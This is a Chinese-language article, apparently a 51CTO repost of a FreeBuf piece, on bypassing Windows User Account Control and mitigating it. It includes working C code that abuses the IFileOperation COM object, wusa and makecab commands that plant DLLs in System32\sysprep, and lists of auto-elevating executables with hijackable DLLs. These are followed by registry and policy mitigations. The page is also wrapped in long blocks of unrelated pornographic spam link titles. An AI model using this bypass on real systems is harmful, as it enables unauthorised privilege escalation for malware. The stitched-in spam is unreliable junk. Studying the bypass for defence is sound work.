精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

Windows用戶帳戶控制(UAC)的繞過與緩解方式

安全 黑客攻防 網(wǎng)站安全
用戶帳戶控制(UAC)給了我們使用標(biāo)準(zhǔn)的用戶權(quán)限代替完全的管理員權(quán)限來運(yùn)行程序的能力。所以即使您的標(biāo)準(zhǔn)用戶帳戶位于本地管理員組中,那么受到的破壞也是有限的,如安裝服務(wù),驅(qū)動程序以及對安全位置執(zhí)行寫入操作,等等,這些行為都是被拒絕的。

在企業(yè)環(huán)境中保護(hù)機(jī)器免受惡意威脅一直是一個持續(xù)的過程。如果給用戶提供了管理員權(quán)限,就會被濫用于安裝未經(jīng)許可的軟件,更改配置,等等。如果不給用戶提供本地管理員權(quán)限,他們就會聲稱他們不能正常開展工作了。如果惡意軟件碰巧感染了擁有完全管理員權(quán)限的機(jī)器,那么你最有可能眼睜睜的看著計(jì)算機(jī)被惡意軟件重新映像。

用戶帳戶控制(UAC) 給了我們使用標(biāo)準(zhǔn)的用戶權(quán)限代替完全的管理員權(quán)限來運(yùn)行程序的能力。所以即使您的標(biāo)準(zhǔn)用戶帳戶位于本地管理員組中,那么受到的破壞也是有限的,如安裝服務(wù),驅(qū)動程序以及對安全位置執(zhí)行寫入操作,等等,這些行為都是被拒絕的。要進(jìn)行這些操作,用戶需要與桌面進(jìn)行交互,如右鍵單擊并以管理員身份運(yùn)行或者是接受 UAC 提升的提示。Microsoft從 Windows Vista 起就引入了UAC,它包含了大量的技術(shù),其中包括文件系統(tǒng)和注冊表虛擬化、保護(hù)管理員 (PA) 帳戶、UAC 提升提示和 Windows 完整性級別。

UAC 的工作原理是調(diào)整我們當(dāng)前的用戶帳戶的權(quán)限級別,所以即使我們擁有計(jì)算機(jī)上的本地管理員權(quán)限,程序的操作還是作為標(biāo)準(zhǔn)用戶進(jìn)行的。當(dāng)程序執(zhí)行的操作需要管理員級別的權(quán)限時(shí), UAC 就會通知我們。如果我們已經(jīng)擁有了本地管理員權(quán)限,那么我們可以單擊“是”繼續(xù),否則系統(tǒng)將會提示您輸入管理員密碼。當(dāng)然這些將取決于您的環(huán)境中定義了何種策略。

本文講述了如何輕松地繞過UAC提升提示并且可以采取哪些措施來減輕這種威脅。

Windows用戶帳戶控制(UAC)的繞過與緩解方式

繞過 UAC

繞過 UAC 是一個簡單的過程。可以采取兩個步驟實(shí)現(xiàn)從標(biāo)準(zhǔn)的用戶權(quán)限到管理員用戶權(quán)限的提升。這些步驟的方法已被廣泛的公布,所以這并不是什么新奇的技術(shù),不過在第二個步驟中會出現(xiàn)一些更多的 DLL 劫持漏洞。

·寫入到安全位置

·利用 DLL 劫持漏洞

為了能成功的繞過 UAC,在開始前我們需要一些事情:

1.一個完整性級別為中等的進(jìn)程

2.一個管理員組中的標(biāo)準(zhǔn)用戶

3.必須由微軟代碼簽名證書簽名過的Windows 可執(zhí)行文件

4.必須位于一個安全目錄的Windows 可執(zhí)行文件

5.Windows 可執(zhí)行文件也必須在他們自身的程序清單中指定自動提升屬性

寫入到安全位置

我們可以使用這幾種方法寫入到安全位置。

·使用 IFileOperation COM 對象

·使用 Windows 更新獨(dú)立安裝程序 (wusa.exe)

IFileOperation COM 對象

IFileOperation COM 對象有一個方法可以用來將文件復(fù)制到安全位置,該操作將會自動進(jìn)行提升并能夠執(zhí)行特權(quán)的拷貝。我們可以在完整性級別為中等的進(jìn)程中注入我們的惡意DLL來執(zhí)行此操作以便能夠繞過UAC。由于COM 對象設(shè)置了自動提升,所以被注入的進(jìn)程在其程序清單中不需要標(biāo)記自動提升。

在 windows 7 中可以成功復(fù)制并能夠注入的進(jìn)程如下:

C:\Windows\explorer.exe
C:\Windows\System32\wuauclt.exe
C:\Windows\System32\taskhost.exe

在測試過程中 taskhost.exe 在開機(jī)后只工作一次,wuauclt.exe 并不是一直可以工作, explorer.exe 是唯一可以使用的可靠進(jìn)程。

在 Windows 8 中可以成功復(fù)制并能夠注入的進(jìn)程如下:

C:\Windows\explorer.exe
C:\Windows\System32\wuauclt.exe
C:\Windows\System32\RuntimeBroker.exe

在 Windows 8.1的測試過程中我發(fā)現(xiàn)Explorer.exe又是唯一可以使用的可靠進(jìn)程。

下面的代碼的主要部分是從MSDN 中得到的,只是做了一些輕微的變化。 SetOperationFlags 的值取自在這里公布的 UAC 繞過代碼

#include <stdio.h>#include <Shobjidl.h>#include <Windows.h>
 
#pragma comment(lib, "Ole32.lib")#pragma comment(lib, "shell32.lib")
 
int WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved){FileOperation  *pfo;IShellItem      *psiFrom = NULL;IShellItem      *psiTo = NULL;
LPCWSTR pszSrcItem = L"calc.dll";
LPCWSTR pszNewName = L"cryptbase.dll";
LPCWSTR pszDest    = L"C:\\windows\\System32\\sysprep";
 
HRESULT hr = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE);if (SUCCEEDED(hr)){
 hr = CoCreateInstance(CLSID_FileOperation, NULL, CLSCTX_ALL, IID_PPV_ARGS(&pfo));
 if (SUCCEEDED(hr))
 {
 hr = pfo->SetOperationFlags( FOF_NOCONFIRMATION |
 FOF_SILENT |
 FOFX_SHOWELEVATIONPROMPT |
 FOFX_NOCOPYHOOKS |
 FOFX_REQUIREELEVATION |
 FOF_NOERRORUI );
 if (SUCCEEDED(hr))
 {
 hr = SHCreateItemFromParsingName(pszSrcItem, NULL, IID_PPV_ARGS(&psiFrom));
 if (SUCCEEDED(hr))
 {
 if (NULL != pszDest)
 {
 hr = SHCreateItemFromParsingName(pszDest, NULL, IID_PPV_ARGS(&psiTo));
 }
 if (SUCCEEDED(hr))
 {
 hr = pfo->CopyItem(psiFrom, psiTo, pszNewName, NULL);
 if (NULL != psiTo)
 {
 psiTo->Release();
 }
 }
 psiFrom->Release();
 }
 if (SUCCEEDED(hr))
 {
 hr = pfo->PerformOperations();
 }
 }
 pfo->Release();
 }
 CoUninitialize();
 }
 return 0;}

#p#

Windows 更新獨(dú)立安裝程序

另外一種可用于復(fù)制文件到安全位置的方法是使用Windows 更新獨(dú)立安裝程序 (wusa.exe)。Wusa.exe執(zhí)行時(shí)作為高級別完整性進(jìn)程運(yùn)行就如同在其清單中設(shè)置了自動提升一樣。對于自動進(jìn)行 UAC提升的Windows 可執(zhí)行文件,必須是被簽名過的文件,并位于如 C:\Windows\System32 的安全目錄中,并且必須在其清單中指定的自動提升屬性。

Windows用戶帳戶控制(UAC)的繞過與緩解方式

 

我們使用 wusa.exe解壓一個 CAB 文件到我們的安全位置:

wusa c:\users\user1\desktop\poc.tmp /extract:c:\windows\system32\sysprep

在這個示例中,我們的 cab 文件為 poc.tmp,不過我們可以將它命名為任何我們所喜歡的名稱。Windows 帶有 makecab.exe 工具,所以我們甚至可以創(chuàng)建我們自己的 cab 文件。

makecab c:\users\user1\desktop\CRYPTBASE.dll c:\users\user1\desktop\poc.tmp

利用 DLL 劫持漏洞

當(dāng)利用一個 DLL 劫持漏洞時(shí),我們要運(yùn)行的可執(zhí)行文件需要已簽名的文件并位于安全目錄中,還必須在其程序清單中指定自動提升屬性以便作為一個高級別完整性的進(jìn)程加載。

在 Windows 7 上,有三個可執(zhí)行文件可被利用并且相關(guān)的 DLL如下:

C:\windows\ehome\Mcx2Prov.exe
C:\Windows\ehome\CRYPTBASE.dll
 
C:\windows\System32\sysprep\sysprep.exe
C:\Windows\System32\sysprep\CRYPTSP.dll
C:\windows\System32\sysprep\CRYPTBASE.dll
C:\Windows\System32\sysprep\RpcRtRemote.dll
C:\Windows\System32\sysprep\UxTheme.dll
 
C:\windows\System32\cliconfg.exe
C:\Windows\System32\NTWDBLIB.DLL

去年6 月 25 日提交在Malwr.com 上的一種惡意軟件已經(jīng)在采用 Mcx2Prov.exe 來繞過 UAC 并且沒過多久該利用漏洞就被公布了。

Windows用戶帳戶控制(UAC)的繞過與緩解方式

 

相同 HASH 的惡意軟件在四個月前被提交在VirusTotal (38/54)上。

在 Windows 8 上同樣有三個可執(zhí)行程序可被利用,相關(guān)的DLL 如下:

C:\windows\System32\sysprep\sysprep.exe
C:\windows\System32\sysprep\CRYPTBASE.dll
C:\Windows\System32\Sysprep\dwmapi.dll
C:\Windows\System32\Sysprep\SHCORE.dll
 
C:\windows\System32\cliconfg.exe
C:\Windows\System32\NTWDBLIB.DLL
 
C:\windows\System32\pwcreator.exe
C:\Windows\System32\vds.exe
C:\Windows\System32\UReFS.DLL

最終在 Windows 8.1 中也同樣有三個可被利用的可執(zhí)行程序,相關(guān)的DLL 如下:C:\windows\System32\sysprep\sysprep.exe

C:\Windows\System32\Sysprep\SHCORE.dll
C:\Windows\System32\Sysprep\OLEACC.DLL
 
C:\windows\System32\cliconfg.exe
C:\Windows\System32\NTWDBLIB.DLL
 
C:\windows\System32\pwcreator.exe
C:\Windows\System32\vds.exe
C:\Program Files\Common Files\microsoft shared\ink\CRYPTBASE.dll
C:\Program Files\Common Files\microsoft shared\ink\CRYPTSP.dll
C:\Program Files\Common Files\microsoft shared\ink\dwmapi.dll
C:\Program Files\Common Files\microsoft shared\ink\USERENV.dll
C:\Program Files\Common Files\microsoft shared\ink\OLEACC.dll

在調(diào)用 pwcreateor.exe 可執(zhí)行文件時(shí),它會調(diào)用 vds.exe(虛擬磁盤服務(wù)),之后會加載我們的DLL 并且執(zhí)行后的進(jìn)程的完整性級別為系統(tǒng)級別。

Windows用戶帳戶控制(UAC)的繞過與緩解方式

 

在調(diào)用 sysprep.exe,cliconfig.exe,pwcreateor.exe 時(shí)會產(chǎn)生一個GUI窗口,你應(yīng)該可以輕松的使它們運(yùn)行在后臺,并且在繞過 UAC之后將它們結(jié)束掉。

Windows用戶帳戶控制(UAC)的繞過與緩解方式 

Windows用戶帳戶控制(UAC)的繞過與緩解方式 

Windows用戶帳戶控制(UAC)的繞過與緩解方式 #p#

 

緩解措施

防止繞過 UAC的最好的方法是在用戶的機(jī)器中不要給予他們本地管理員權(quán)限。在企業(yè)環(huán)境中的絕大多數(shù)用戶帳戶你都應(yīng)該這么去做,以減少受攻擊面。然而,這不適用于在默認(rèn)情況下具有本地管理員權(quán)限的家庭用戶。

在實(shí)際的繞過中,僅對 UAC設(shè)置中的中間那兩個選項(xiàng)起作用。要查看你的設(shè)置你可以在控制面板——用戶帳戶——改變用戶帳戶控制設(shè)置 中查看。

僅當(dāng)應(yīng)用程序嘗試更改我的計(jì)算機(jī)時(shí)通知我(默認(rèn))

僅當(dāng)應(yīng)用程序嘗試更改我的計(jì)算機(jī)時(shí)通知我(不降低桌面亮度)

Windows用戶帳戶控制(UAC)的繞過與緩解方式

 

因此,我們需要設(shè)置為“總是通知”,但是這樣做有點(diǎn)像Windows Vista一樣會持續(xù)進(jìn)行通知,所以這并不實(shí)用,并且到最后,用戶可能會設(shè)置為“從不通知”,這樣的話,看起來這并不是一個好主意。

Microsoft 提供了 10 個UAC策略,我們有必要在你的域環(huán)境中實(shí)施策略前花點(diǎn)時(shí)間來了解并測試這些策略。你可以在開始-運(yùn)行中鍵入 secpol.msc 來打開本地計(jì)算機(jī)的本地安全策略并展開 本地策略,在安全選項(xiàng)里可以找到應(yīng)用在本地計(jì)算機(jī)的用戶帳戶控制策略。可以使用 rsop.msc 查看在域中應(yīng)用到本地的組策略。

Windows用戶帳戶控制(UAC)的繞過與緩解方式

 

在注冊表中,UAC的默認(rèn)設(shè)置如下:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]"ConsentPromptBehaviorAdmin"=dword:00000005"ConsentPromptBehaviorUser"=dword:00000003"EnableInstallerDetection"=dword:00000001"EnableLUA"=dword:00000001"EnableSecureUIAPaths"=dword:00000001"EnableUIADesktopToggle"=dword:00000000"EnableVirtualization"=dword:00000001"FilterAdministratorToken"=dword:00000000"PromptOnSecureDesktop"=dword:00000001"ValidateAdminCodeSignatures"=dword:00000000

把“用戶帳戶控制設(shè)置”設(shè)置為“總是通知”,相關(guān)的注冊項(xiàng)的值改變?nèi)缦拢?/p>

"ConsentPromptBehaviorAdmin"=dword:00000002

把“用戶帳戶控制設(shè)置”設(shè)置為“僅當(dāng)應(yīng)用程序嘗試更改我的計(jì)算機(jī)時(shí)通知我(不降低桌面亮度)” 相關(guān)的注冊項(xiàng)的值改變?nèi)缦拢?/p>

"PromptOnSecureDesktop"=dword:00000000

當(dāng)把“用戶帳戶控制設(shè)置”設(shè)置為“從不通知”時(shí),相關(guān)的注冊項(xiàng)的值改變?nèi)缦拢?/p>

"ConsentPromptBehaviorAdmin"=dword:00000000"EnableLUA"=dword:00000000"PromptOnSecureDesktop"=dword:00000000

我們注意到 "EnableLUA"的值為0 ,意味著UAC已被禁用。這是非常危險(xiǎn)的,因此,強(qiáng)烈推薦您在組策略中設(shè)置此設(shè)置選項(xiàng),這樣可以在用戶或者是被以前刪除的惡意軟件重置/改變了設(shè)置選項(xiàng)后,依舊可以應(yīng)用策略,啟用UAC。

用戶帳戶控制: 以管理員批準(zhǔn)模式運(yùn)行所有管理員

一旦禁用此策略將有不只一個惡意進(jìn)程能夠直接并無需任何繞過行為就能以高級別完整性運(yùn)行而且 IE瀏覽器進(jìn)程的完整性級別為中等。在IE瀏覽器提供的額外的安全性中,UAC 給用戶提供了保護(hù)模式 (沙盒)。IE瀏覽器通常在低級別完整性的子進(jìn)程中運(yùn)行,因此會將IE 漏洞所帶來的一些威脅最小化并且在低級別完整性中,可寫入的位置很少。

上述這些改變在 Windows 7中有效,在Windows 8/8.1中 EnableLUA 不會被更改為禁用狀態(tài)。因此,在將“用戶帳戶控制”設(shè)置為“從不通知”時(shí),只產(chǎn)生了下列改變:

"ConsentPromptBehaviorAdmin"=dword:00000000"PromptOnSecureDesktop"=dword:00000000

這個時(shí)候,由于“EnableLUA”=dword:00000001的值沒有發(fā)生改變,因此, UAC沒有完全禁用,同時(shí)IE瀏覽器依舊運(yùn)行在低級別完整性中。

然而,如果一個用戶使用本地管理員帳戶登錄到計(jì)算機(jī)時(shí),UAC的設(shè)置對于所有使用高級別完整性的進(jìn)程是不起作用的。因此,在Windwos 7/8 和 8.1中,總是要確保用戶沒有使用本地管理員帳戶登錄計(jì)算機(jī),如果將域帳戶添加到本地管理員組中將會更好的請求本地管理員權(quán)限。

Windows用戶帳戶控制(UAC)的繞過與緩解方式 

Windows用戶帳戶控制(UAC)的繞過與緩解方式

 

不管出于什么原因使用本地管理員帳戶登錄計(jì)算機(jī),最好設(shè)置 UAC 策略為啟用狀態(tài)。

用戶帳戶控制: 對內(nèi)置管理員帳戶使用管理審批模式

FilterAdministratorToken”=dword:00000001

另一個選項(xiàng)則是如果在系統(tǒng)上不是必須需要這些程序,你可以重命名或刪除Mcx2Prov.exe、 sysprep.exe、 cliconfg.exe 和 pwcreator.exe 可執(zhí)行文件,這樣,在第二個步驟中利用 DLL 劫持就會失敗。

最后,如果用戶請求本地管理員權(quán)限并且值得他們修改計(jì)算機(jī)的UAC為“總是通知“,那么他們將會得到持續(xù)不斷的通知。

用戶帳戶控制: 在管理審批模式下管理員的提升提示行為(在安全桌面上同意提示)

結(jié)論

這些繞過方式僅在滿足所有的條件時(shí)才會起作用,只要有一個條件不滿足,那么繞過 UAC就會失敗。Office 文檔進(jìn)程的完整性級別為中等,因此,這將是一個理想的用于 UAC繞過的目標(biāo)。由于可以毫不費(fèi)力地實(shí)現(xiàn) UAC 的繞過,真正唯一能做的就是將 UAC 設(shè)置為"始終通知"或刪除該用戶的本地管理權(quán)限。最后可以使用像微軟的 EMET或 MalwareBytes 來更好的防御零日漏洞。

這是一些源代碼和二進(jìn)制文件,你可以自行測試。我測試了 Windows 企業(yè)版的 7/8/8.1 64 位系統(tǒng)。

參考與引用

http://technet.microsoft.com/en-us/magazine/2009.07.uac.aspx

http://technet.microsoft.com/en-us/magazine/2007.06.uac.aspx

http://windows.microsoft.com/en-gb/windows/what-is-user-account-control#1TC=windows-7

http://windows.microsoft.com/en-gb/windows/what-are-user-account-control-、settings#1TC=windows-7

http://blog.cobaltstrike.com/2014/03/20/user-account-control-what-penetration-testers-should-know

責(zé)任編輯:藍(lán)雨淚 來源: FreeBuf
相關(guān)推薦

2015-10-12 11:37:07

2017-05-05 12:23:25

2010-12-27 14:33:01

用戶帳戶控制

2012-05-03 08:44:31

2018-11-13 12:56:57

2010-12-07 14:10:56

Windows 7用戶帳戶控制

2010-02-25 09:57:35

2010-11-29 14:05:29

2010-01-20 09:11:56

2009-06-24 08:51:55

2010-03-22 09:17:15

Office 97Windows 7UAC

2019-12-09 10:30:42

Windows 10帳戶Windows

2017-03-23 12:23:27

sdclt磁盤備份UAC

2010-06-09 16:39:38

用戶帳戶網(wǎng)絡(luò)安全

2009-04-08 13:01:06

2009-04-09 08:57:22

Windows 7微軟操作系統(tǒng)

2010-05-06 14:37:26

2009-12-23 08:49:21

Windows 7UAC兼容性

2009-04-22 08:56:11

Windows 7微軟操作系統(tǒng)

2010-05-05 09:54:55

點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號

91色视频在线观看| www.久久久久| 日本成人中文字幕在线| 国产精品一区二区婷婷| 精品制服美女久久| 欧美激情精品久久久久久变态| 这里只有精品在线观看视频| 欧美日韩免费观看视频| 亚洲天堂中文字幕| 精品蜜桃一区二区三区| 在线观看国产区| 国产精品第十页| 一区二区三区四区精品| 日韩女优在线视频| 国产成人77亚洲精品www| 亚洲一区二区在线播放相泽| 日韩免费毛片| 亚洲av综合色区无码一区爱av| 久久久国产精品一区二区中文| 久久视频在线看| xxxx日本黄色| 成人h动漫精品一区二区器材| 欧美日韩在线一区二区| 国产视频一视频二| 中中文字幕av在线| 中日韩免费视频中文字幕| 国产91aaa| 国产孕妇孕交大片孕| 亚洲欧美日韩国产一区二区| 欧美激情欧美激情| 久草手机视频在线观看| 免费成人结看片| 亚洲的天堂在线中文字幕| 无尽裸体动漫2d在线观看| 在线手机中文字幕| 亚洲成人av福利| 福利网在线观看| 97视频在线观看网站| 97超碰欧美中文字幕| 99c视频在线| 国产免费久久久| 久久精品国产网站| 国产精品久久久久久久久久三级| 欧美片一区二区| 忘忧草精品久久久久久久高清| 国产一区二区三区精品久久久 | 国产精品男女视频| 激情综合亚洲| 久久久视频免费观看| 青草影院在线观看| 欧美一区二区三区久久精品| 久久精品国产一区二区电影| 99热6这里只有精品| 日本激情一区| 色yeye香蕉凹凸一区二区av| 国产一二三四视频| 成人三级视频| 色偷偷av亚洲男人的天堂| 日本人亚洲人jjzzjjz| 国产精品亚洲人成在99www| 亚洲欧洲在线免费| 妺妺窝人体色WWW精品| 欧洲乱码伦视频免费| 一区二区三区精品99久久| 黄色三级生活片| 久久亚洲精品中文字幕蜜潮电影| 日韩一区二区三区国产| 神马午夜精品91| 伊人色**天天综合婷婷| 欧美精品在线免费| 午夜偷拍福利视频| 国产精品乱看| 国产精品美女www爽爽爽视频| 在线观看中文字幕av| 青青青爽久久午夜综合久久午夜| 国产有码在线一区二区视频| 国产农村妇女毛片精品| 国产a精品视频| 久久国产精品一区二区三区四区| 男同在线观看| 最近日韩中文字幕| 亚洲色欲久久久综合网东京热| 理论不卡电影大全神| 色一区在线观看| 日本77777| 777久久精品| 亚洲偷欧美偷国内偷| 成人18视频免费69| 黄色成人91| 日本一区二区三区在线播放| 国产一区二区在线播放视频| 成人午夜视频福利| 欧美一区免费视频| 超碰超碰在线| 色综合天天天天做夜夜夜夜做| 亚洲色图久久久| 亚洲va欧美va人人爽成人影院| 亚洲精品久久久久| 精品在线观看一区| 1024日韩| 91精品久久久久久久久久入口| 人妻va精品va欧美va| 国产午夜久久久久| 国产精品国三级国产av| 朝桐光一区二区| 欧美xxxx老人做受| 美国一级黄色录像| 亚洲精品1234| 91久久国产精品91久久性色| 欧洲成人av| 亚洲自拍偷拍综合| 欧美性猛交久久久乱大交小说| 午夜视频一区二区在线观看| 一区国产精品视频| 日本三级2019| 国产在线视频不卡二| 欧美亚洲免费高清在线观看| 青青青草视频在线| 欧美日韩精品福利| 毛片网站免费观看| 黄色免费成人| 国产精品99导航| 三级视频网站在线| 亚洲成人激情av| 99热这里只有精品2| 日本成人小视频| 国产mv久久久| 欧美日韩国产综合视频| 亚洲一区二区五区| 69久久精品无码一区二区 | 成人国产在线看| 欧美一区二区三区婷婷| 亚洲性av网站| 亚洲成人第一网站| 91网址在线看| 日韩精品xxxx| 日韩av三区| 97热精品视频官网| 丰满人妻一区二区| 一个色在线综合| 女王人厕视频2ⅴk| 中文字幕av亚洲精品一部二部| 国产精品网红直播| 18视频免费网址在线观看| 在线一区二区三区四区五区 | 亚洲精品成人天堂一二三| 在线观看免费视频高清游戏推荐| 国产成人一区| 国产精品激情自拍| p色视频免费在线观看| 在线中文字幕不卡| 九九九视频在线观看| 日韩国产精品大片| 亚洲国产精品一区二区第一页| 向日葵视频成人app网址| 亚洲欧美色婷婷| 亚洲精品一区二三区| 国产欧美一区二区三区在线老狼| 国产v亚洲v天堂无码久久久| 国产91精品对白在线播放| 日韩暖暖在线视频| 国产福利小视频在线| 欧美日韩一区中文字幕| 男人的午夜天堂| 国产福利电影一区二区三区| 日本大片免费看| 青青一区二区| 国产精品久久久久久av福利| 免费网站黄在线观看| 欧美一激情一区二区三区| 久久亚洲AV无码| 久久综合久久久久88| 爆乳熟妇一区二区三区霸乳| 久久国产电影| av蓝导航精品导航| 丝袜诱惑一区二区| 最近2019年日本中文免费字幕| 国产精品毛片一区视频播| 亚洲一区二区三区中文字幕在线| 中文字幕乱码在线| 日韩和欧美的一区| 大地资源网在线观看免费官网| 久久久久久久久久久久久久久久久久久久| 136fldh精品导航福利| 成人在线观看黄色| 日韩三级免费观看| aaaaaa毛片| 亚洲欧美成aⅴ人在线观看| 精品人妻一区二区三区日产| 日本伊人色综合网| 九一免费在线观看| 曰本一区二区三区视频| 91精品啪aⅴ在线观看国产| 黄色视屏在线免费观看| 日韩亚洲成人av在线| 涩涩视频免费看| 欧美视频三区在线播放| 国产在线视频99| 国产精品色呦呦| 国产精品久久久久久久无码| 国产精品波多野结衣| 日韩三级一区二区三区| 国产夜色精品一区二区av| 91pony九色| 亚洲伊人网站| 蜜臀在线免费观看| 神马影视一区二区| 国产高清一区视频| jizz欧美| 秋霞午夜一区二区| 在线heyzo| 中文字幕亚洲天堂| 五月激情婷婷综合| 91精品国产综合久久久久| 久久久久久久久久久久久av| 亚洲日穴在线视频| 免费在线观看a视频| 不卡的看片网站| 国产又粗又猛大又黄又爽| 老色鬼久久亚洲一区二区| 亚洲色成人www永久在线观看| 久久资源中文字幕| 日本一区二区三区精品视频| aiss精品大尺度系列| 国产主播精品在线| aaaa欧美| 国产精品视频一| 日韩性xxx| 欧美一级片一区| 高清毛片在线观看| 欧美极品美女电影一区| 欧美一级二级三级区| 亚洲人成电影网站色www| 亚洲av成人无码网天堂| 亚洲高清在线观看| 嫩草影院一区二区| 欧美成人精品1314www| 国产情侣一区二区| 4438成人网| 国产精品久久久久久免费免熟| 欧美天堂一区二区三区| 日日夜夜狠狠操| 色国产综合视频| 日本黄色中文字幕| 色悠悠亚洲一区二区| 国产高清中文字幕| 欧美性生交xxxxxdddd| 精品美女久久久久| 黑人狂躁日本妞一区二区三区| 国产成人免费观看视频| 性做久久久久久免费观看欧美| 国产精品30p| 激情av一区二区| 在线免费黄色av| 色婷婷综合在线| 真实的国产乱xxxx在线91| 在线观看91精品国产入口| 黄色污污视频软件| 欧美日韩精品二区第二页| 一区二区三区免费在线| 91精品国产色综合久久ai换脸| 99久久精品日本一区二区免费| 日韩欧美专区在线| 蜜桃久久一区二区三区| 亚洲丁香久久久| 可以在线观看的av网站| 一区二区三区视频在线| 国产一二区在线| 久久91精品国产91久久跳| 91白丝在线| 国产精品扒开腿做爽爽爽视频| 麻豆久久久久| 成人一区二区在线| 妖精视频一区二区三区| 亚洲日本理论电影| 欧美欧美全黄| 波多野结衣家庭教师视频| 奇米影视7777精品一区二区| 日韩 国产 一区| www.久久久久久久久| 亚洲а∨天堂久久精品2021| 亚洲天堂a在线| 尤物视频在线观看国产| 精品视频一区三区九区| 免费观看毛片网站| 国产一区二区激情| 日本天码aⅴ片在线电影网站| 欧美综合在线观看| 日日夜夜亚洲精品| 黑人另类av| 久久亚洲影视| 116极品美女午夜一级| 免费欧美在线视频| 午夜剧场免费看| 国产精品久久99| 黄色片视频网站| 在线播放欧美女士性生活| 少妇一级淫片免费看| 色悠悠国产精品| 黄色视屏在线免费观看| 成人在线中文字幕| 在线看成人短视频| 中文精品无码中文字幕无码专区| 久久午夜精品一区二区| 日本一二三区在线| 国产调教视频一区| 国产污视频在线观看| 8x福利精品第一导航| 美女欧美视频在线观看免费 | 日本在线免费网| 97在线观看视频| 国产视频一区二| 色姑娘综合av| 国产精品免费看| 男人添女人荫蒂国产| 中文字幕不卡在线| 国产69精品久久久久久久久久| 91精品国产色综合久久不卡蜜臀| 国产高清免费av在线| 91大神在线播放精品| 8848成人影院| 五月天在线免费视频| 青青草91视频| 无码国产69精品久久久久同性| 一个色综合网站| 99国产精品99| 日韩色av导航| 美女久久久久久| 亚洲精品在线视频观看| 另类av一区二区| 中出视频在线观看| 亚洲777理论| 欧美特黄一级视频| 欧美激情视频在线观看| 国产高清亚洲| 四虎影院一区二区| 精品一区二区三区在线播放视频| 人成免费在线视频| 在线视频国内一区二区| 精品无吗乱吗av国产爱色| 欧美在线xxx| 蜜桃成人av| 一区二区在线播放视频| 久久久电影一区二区三区| 国产精品男女视频| 亚洲欧美国产精品久久久久久久| 欧美aaaaa性bbbbb小妇| 精品一卡二卡三卡四卡日本乱码| 亚洲高清电影| 久久福利小视频| 精品久久中文字幕久久av| 天堂国产一区二区三区| 91av中文字幕| 国产精品片aa在线观看| 日日碰狠狠丁香久燥| 欧美激情一区二区三区蜜桃视频| 国产精品欧美综合| 色妞欧美日韩在线| 国产亚洲久久| 国产手机免费视频| 白白色亚洲国产精品| 少妇一级淫片免费放中国| 亚洲毛片在线看| 福利一区二区| 影音先锋成人资源网站| 国产不卡一区视频| 久久久久久久久影院| 国产一区二区三区视频免费| 日韩深夜福利网站| 波多野结衣av一区二区全免费观看| 成人午夜大片免费观看| 国产99久久久| 日韩在线一区二区三区免费视频| 久久中文字幕一区二区| 国产精品成人久久电影| 久久精子c满五个校花| 夜夜躁很很躁日日躁麻豆| 欧美另类xxx| 一区二区三区韩国免费中文网站| 男女男精品视频站| 一区二区三区成人| 免费一级在线观看播放网址| 国产日韩在线播放| 亚洲午夜电影| 亚洲无人区码一码二码三码的含义 | 成人综合婷婷国产精品久久蜜臀| 亚洲免费在线视频观看| 日韩亚洲国产中文字幕| 六月丁香久久丫| 在线观看免费的av| 五月激情综合网| 麻豆传媒视频在线观看免费| 国产综合第一页| 久久国产精品99精品国产| 国产午夜免费视频| 日韩在线观看高清| 亚洲国产欧美日韩在线观看第一区 | 亚洲网站免费| av免费观看网| 一区二区三区影院|